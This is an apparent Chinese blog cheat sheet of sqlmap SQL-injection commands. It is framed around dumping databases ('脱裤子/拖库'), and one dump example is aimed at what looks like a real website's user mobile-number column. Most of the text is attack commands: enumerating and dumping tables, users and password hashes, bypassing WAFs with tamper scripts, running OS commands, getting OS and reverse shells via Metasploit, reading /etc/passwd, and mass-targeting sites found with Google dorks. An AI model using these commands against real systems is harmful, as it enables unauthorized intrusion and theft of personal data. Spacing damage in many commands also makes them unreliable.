sqlmap参数小全

《sqlmap参数小全》

Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,
其实Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。
sqlmap是基于Python编写的,支持的数据库有mysql,oracle,等等
支持枚举用户,密码哈希,权限,角色,数据库,表和列
自动识别密码加密方式,并且可以用字典解密,脱裤子
sql的注入类型包括,sql盲注,显错式注入,时间注入,盲注推理,堆查询注入等技术

更新升级:sqlmap-update
svncheckouthttps://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlmap-dev

sqlmap.py -u “url” 检测存在不存在注入
sqlmap.py -u “url” –tables 列出数据库的表
sqlmap.py -u “url” –columns -T admin 列出admin的内容
sqlmap.py -u “url” –dump -T admin “useradmin,password” 列出useradmin password的内容

–proxy “http://120.198.243.79:80” 解决proxy

–tamper “space2morehash.py” -v 3 SQLMap绕过WAF
–tamper “space2mssqlblank” -v 3 Mysql 伪静态注入
sqlmap.py -u url –dbms “Mysql” –current-db 当前数据库
sqlmap.py -u “url” –dbs 列出数据库
sqlmap.py -u “url” -D xxxx –tables 列出指定数据库的表
sqlmap.py -u “url” -D xxxx -T xxx –columns 列出指定表的内容
sqlmap.py -u “url” -D xxxx -T xxx -C xxx,aaa –dump 列出指定字段xxx和aaa的的内容
sqlmap.py -u “www.xxx.com/index.php” –cokies “id=7” –tables 用cookies方式列出数据库的表
sqlmap.py -u “www.xxx.com/index.php” –data “user=1&pass=1” –dbs 指定post参数注入出数据库
sqlmap.py -u “www.xxx.com/index.php” –forms sqlmap自动查找网页上的表单,并注入
sqlmap.py -r 1.txt -p user 用burp抓包,保存为1.txt 然后用-r参数注入,用-p参数来指定网页上的参数
运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。 注意-p 后面的参数是否打错

sqlmap.py -u “url” –os-cmd=ipconfig 执行ipconfig命令,必须有足够的权限
sqlmap.py -u “url” –os-shell 获得一个shell 会在网站目录下生成两个文件,一个是tmpbxbxz.php他是来运行shell的。 一个是tmpuoiuz.php他是来上传文件的

sqlmap.py –dump -D 数据库 -T 表 拖库

sqlmap.py -u 注入地址 –privileges 查看权限

sqlmap.py -g “inurl:\”.php?id=1\”” 处理Google的搜索结果
-proxy “http://120.198.243.79:80”

前100条数据
-u http://www.hongzhoukan.com/hlc_video_content.php?id=53 –dump -D hzk -T hk_user -C mobile -start 1 -stop 100
使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

***************信息获取******************
sqlmap-u”http://url/news?id=1″ –smart –level3–users #smart智能level 执行测试等级

sqlmap-u”http://url/news?id=1″–dbms”Mysql”–users #dbms指定数据库类型

sqlmap-u”http://url/news?id=1″–users#列数据库用户

sqlmap-u”http://url/news?id=1″–dbs#列数据库

sqlmap-u”http://url/news?id=1″–passwords#数据库用户密码

sqlmap-u”http://url/news?id=1″ –passwords-Uroot-v0#列出指定用户数据库密码

sqlmap-u”http://url/news?id=1″–dump-C”password,user,id”-T”tablename”-D”db_name”–start1–stop20#列出指定字段,列出20条

sqlmap-u”http://url/news?id=1″–dump-all-v0#列出所有数据库所有表

sqlmap-u”http://url/news?id=1″–privileges#查看权限

sqlmap-u”http://url/news?id=1″–privileges-Uroot#查看指定用户权限

sqlmap-u”http://url/news?id=1″–is-dba-v1#是否是数据库管理员

sqlmap-u”http://url/news?id=1″–roles#枚举数据库用户角色

sqlmap-u”http://url/news?id=1″–udf-inject#导入用户自定义函数(获取系统权限!)

sqlmap-u”http://url/news?id=1″–dump-all–exclude-sysdbs-v0#列出当前库所有表

sqlmap-u”http://url/news?id=1″–union-cols#union查询表记录

sqlmap-u”http://url/news?id=1″–cookie”COOKIE_VALUE”#cookie注入sqlmap-u”http://url/news?id=1″ -b#获取banner信息

sqlmap-u”http://url/news?id=1″–data”id=3″#post注入sqlmap-u”http://url/news?id=1″-v1-f#指纹判别数据库类型

sqlmap-u”http://url/news?id=1″ –proxy”http://127.0.0.1:8118″#代理注入 sqlmap-u”http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”#指定关键词

sqlmap-u”http://url/news?id=1″–sql-shell#执行指定sql命令

sqlmap-u”http://url/news?id=1″–file/etc/passwd sqlmap-u”http://url/news?id=1″ –os-cmd=whoami#执行系统命令

sqlmap-u”http://url/news?id=1″–os-shell#系统交互

shellsqlmap-u”http://url/news?id=1″–os-pwn#反弹shell

sqlmap-u”http://url/news?id=1″–reg-read#读取win系统注册表

sqlmap-u”http://url/news?id=1″–dbs-o”sqlmap.log”#保存进度

sqlmap-u”http://url/news?id=1″–dbs-o”sqlmap.log”–resume#恢复已保存进度

sqlmap-u”http://url/news?id=1″–msf-path=/opt/metasploit3/msf2–os-pwn反弹shell需 metasploit路径

sqlmap-u”http://url/news?id=1″ –tamper”base64encode.py”加载脚本(可利用绕过注入限制)

sqlmap-g”google语法”–dump-all–batch#google搜索注入点自动跑出所有字段攻击实例: sqlmap-u”http://url/news?id=1&Submit=Submit”–cookie=”PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406″–string=”Surname”–dbms=mysql–users–password
以下纯手打不容易啊

-b 获取banner
-p 指定参数测试
-g inurl:asp?id=这个是id 比如 1 325 1546 1321 从谷歌里面获取URL
-gpage=googlepage 指定谷歌页码
-union-check 是否支持union注入
-os-pwn 反弹shel
–purge-output 安全删除所有内容的输出目录
–level 测试等级(1~5)默认1
–union-use 采用union注入
–proxy 采用代理
–therads 采用多线程
–string 指定关键字
–tor 创建rot匿名网络
-a,-all 查询所有
–hostname 主机名
–is-dba 是否是管理员权限
–users 枚举所有用户
–passwords 枚举所有用户密码
–roles 枚举所有用户角色
–schema 枚举DBMS模式
–check-waf 启发式检查WAF/IPS.IDS保护
–tamper=tamper 使用sqlmap插件

点赞